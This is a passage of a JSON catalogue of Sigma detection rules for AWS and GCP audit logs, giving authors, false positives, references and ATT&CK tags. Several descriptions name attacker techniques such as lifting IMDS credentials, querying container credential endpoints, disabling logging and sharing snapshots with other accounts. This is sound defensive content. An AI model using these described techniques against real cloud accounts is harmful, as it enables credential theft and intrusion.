], "filename": "aws_sts_assumerole_misuse.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/pull/1214", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1548", "attack.t1550", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", "value": "AWS STS AssumeRole Misuse" }, { "description": "Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.\nA change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.\n", "meta": { "author": "Michael McIntyre @wtfender", "creation_date": "2023-09-27", "falsepositive": [ "Authorized changes to the AWS account's identity provider" ], "filename": "aws_sso_idp_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html", "https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html", "https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3adb3ef-b7e7-4003-9092-1924c797db35", "value": "AWS Identity Center Identity Provider Change" }, { "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", "meta": { "author": "faloker", "creation_date": "2020-02-11", "falsepositive": [ "Valid change in the GuardDuty (e.g. to ignore internal scanners)" ], "filename": "aws_guardduty_disruption.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", "value": "AWS GuardDuty Important Change" }, { "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", "meta": { "author": "Elastic, Austin Songer @austinsonger", "creation_date": "2021-07-22", "falsepositive": [ "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_route_53_domain_transferred_to_another_account.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", "value": "AWS Route 53 Domain Transferred to Another Account" }, { "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", "meta": { "author": "Darin Smith", "creation_date": "2021-05-17", "falsepositive": [ "Valid change to a snapshot's permissions" ], "filename": "aws_snapshot_backup_exfiltration.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.justice.gov/file/1080281/download", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml" ], "tags": [ "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", "value": "AWS Snapshot Backup Exfiltration" }, { "description": "Detects disabling, deleting and updating of a Trail", "meta": { "author": "vitaliy0x1", "creation_date": "2020-01-21", "falsepositive": [ "Valid change in a 
Trail" ], "filename": "aws_cloudtrail_disable_logging.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", "value": "AWS CloudTrail Important Change" }, { "description": "Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.", "meta": { "author": "daniel.bohannon@permiso.io (@danielhbohannon)", "creation_date": "2023-05-17", "falsepositive": [ "Valid usage of S3 Browser for IAM LoginProfile listing and/or creation" ], "filename": "aws_iam_s3browser_loginprofile_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059.009", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db014773-b1d3-46bd-ba26-133337c0ffee", "value": "AWS IAM S3Browser LoginProfile Creation" }, { "description": "Detects when an instance identity 
has taken an action that isn't inside SSM.\nThis can indicate that a compromised EC2 instance is being used as a pivot point.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services" ], "filename": "aws_cloudtrail_imds_malicious_usage.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/", "https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things", "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1078", "attack.t1078.002" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "352a918a-34d8-4882-8470-44830c507aa3", "value": "Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure" }, { "description": "Detect when System Manager successfully executes commands against an instance.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "There are legitimate uses of SSM to send commands to EC2 instances", "Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them" ], "filename": "aws_cloudtrail_ssm_malicious_usage.yml", "level": "high", 
"logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1566", "attack.t1566.002" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38e7f511-3f74-41d4-836e-f57dfa18eead", "value": "Potential Malicious Usage of CloudTrail System Manager" }, { "description": "Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\nThis can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.\n", "meta": { "author": "Darin Smith", "creation_date": "2022-06-07", "falsepositive": [ "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" ], "filename": "aws_ecs_task_definition_cred_endpoint_query.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml" ], "tags": [ "attack.persistence", "attack.t1525" ] }, "related": [ { "dest-uuid": 
"4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", "value": "AWS ECS Task Definition That Queries The Credential Endpoint" }, { "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", "meta": { "author": "Diogo Braz", "creation_date": "2020-04-16", "falsepositive": "No established falsepositives", "filename": "aws_ec2_vm_export_failure.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml" ], "tags": [ "attack.collection", "attack.t1005", "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "value": "AWS EC2 VM Export Failure" }, { "description": "Detects changes to the EC2 instance startup script. 
The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Valid changes to the startup script" ], "filename": "aws_ec2_startup_script_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1059.003", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "value": "AWS EC2 Startup Shell Script Change" }, { "description": "Detects when S3 bucket versioning is disabled. 
Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.", "meta": { "author": "Sean Johnstone | Unit 42", "creation_date": "2023-10-28", "falsepositive": [ "AWS administrator legitimately disabling bucket versioning" ], "filename": "aws_disable_bucket_versioning.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a136ac98-b2bc-4189-a14d-f0d0388e57a7", "value": "AWS S3 Bucket Versioning Disable" }, { "description": "Detects the modification of the findings on SecurityHub.", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-28", "falsepositive": [ "System or Network administrator behaviors", "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." 
], "filename": "aws_securityhub_finding_evasion.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", "value": "AWS SecurityHub Findings Evasion" }, { "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "aws_s3_data_management_tampering.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", "https://github.com/elastic/detection-rules/pull/1145/files", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml" ], "tags": [ "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", "value": "AWS S3 Data Management Tampering" }, { "description": "Detects the change of database master password. 
It may be a part of data exfiltration.", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Benign changes to a db instance" ], "filename": "aws_rds_change_master_password.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "value": "AWS RDS Master Password Change" }, { "description": "Detects AWS Config Service disabling", "meta": { "author": "vitaliy0x1", "creation_date": "2020-01-21", "falsepositive": [ "Valid change in AWS Config Service" ], "filename": "aws_config_disable_recording.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07330162-dba1-4746-8121-a9647d49d297", "value": "AWS Config Disabling Channel/Recorder" }, { "description": "Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).\nThis can indicate that a misconfiguration allowing more traffic into the system than required, or could 
indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "Repurposing of an ELB or ALB to serve a different or additional application", "Changes to security groups to allow for new services to be deployed" ], "filename": "aws_cloudtrail_security_group_change_loadbalancer.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a4409fc-f8ca-45f6-8006-127d779eaad9", "value": "LoadBalancer Security Group Modification" }, { "description": "Detects activity when someone is changing passwords on behalf of other users.\nAn attacker with the \"iam:UpdateLoginProfile\" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\n", "meta": { "author": "toffeebr33k", "creation_date": "2021-08-09", "falsepositive": [ "Legitimate user account administration" ], "filename": "aws_update_login_profile.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_update_login_profile.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", "value": "AWS User Login Profile Was Modified" }, { "description": "Detects changes to the security group entries for RDS databases.\nThis can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "Creation of a new Database that needs new security group rules" ], "filename": "aws_cloudtrail_security_group_change_rds.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "14f3f1c8-02d5-43a2-a191-91ffb52d3015", "value": "RDS Database Security Group Modification" }, { "description": "Detects potentially suspicious events involving \"GetSigninToken\".\nAn adversary using the \"aws_consoler\" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.\n", "meta": { "author": "Chester Le Bron (@123Le_Bron)", "creation_date": "2024-02-26", "falsepositive": [ "GetSigninToken events 
will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated." ], "filename": "aws_console_getsignintoken.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/NetSPI/aws_consoler", "https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.007", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8103686-e3e8-46f3-be72-65f7fcb4aa53", "value": "AWS Console GetSigninToken Potential Abuse" }, { "description": "Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"\".", "meta": { "author": "daniel.bohannon@permiso.io (@danielhbohannon)", "creation_date": "2023-05-17", "falsepositive": [ "Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value" ], "filename": "aws_iam_s3browser_templated_s3_bucket_policy_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml" ], "tags": [ "attack.execution", "attack.t1059.009", "attack.persistence", 
"attack.t1078.004" ] }, "related": [ { "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db014773-7375-4f4e-b83b-133337c0ffee", "value": "AWS IAM S3Browser Templated S3 Bucket Policy Creation" }, { "description": "Identifies when the Secrets are Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-09", "falsepositive": [ "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", "value": "Google Cloud Kubernetes Secrets Modified or Deleted" }, { "description": "Detects when storage bucket is enumerated in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Storage Buckets enumerated from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_bucket_enumeration.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/storage/docs/json_api/v1/buckets", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_enumeration.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", "value": "Google Cloud Storage Buckets Enumeration" }, { "description": "Identifies when a service account is modified in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_service_account_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_modified.yml" ], "tags": [ "attack.impact" ] }, "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", "value": "Google Cloud Service Account Modified" }, { "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-13", "falsepositive": [ "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", "Exceptions can be added to this rule to filter expected behavior." 
], "filename": "gcp_firewall_rule_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", "value": "Google Cloud Firewall Modified or Deleted" }, { "description": "Detects when storage bucket is modified or deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "gcp_bucket_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/storage/docs/json_api/v1/buckets", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", "value": "Google Cloud Storage Buckets Modified or Deleted" }, { "description": "Detects when an access policy that is applied to a GCP cloud resource is deleted.\nAn adversary would be able to remove access policies to gain access to a GCP cloud resource.\n", "meta": { "author": "Bryan Lim", "creation_date": "2024-01-12", "falsepositive": [ "Legitimate administrative activities" ], "filename": "gcp_access_policy_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog", "https://cloud.google.com/access-context-manager/docs/audit-logging", "https://cloud.google.com/logging/docs/audit/understanding-audit-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_access_policy_deleted.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32438676-1dba-4ac7-bf69-b86cba995e05", "value": "GCP Access Policy Deleted" }, { "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "VPN Tunnel being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your 
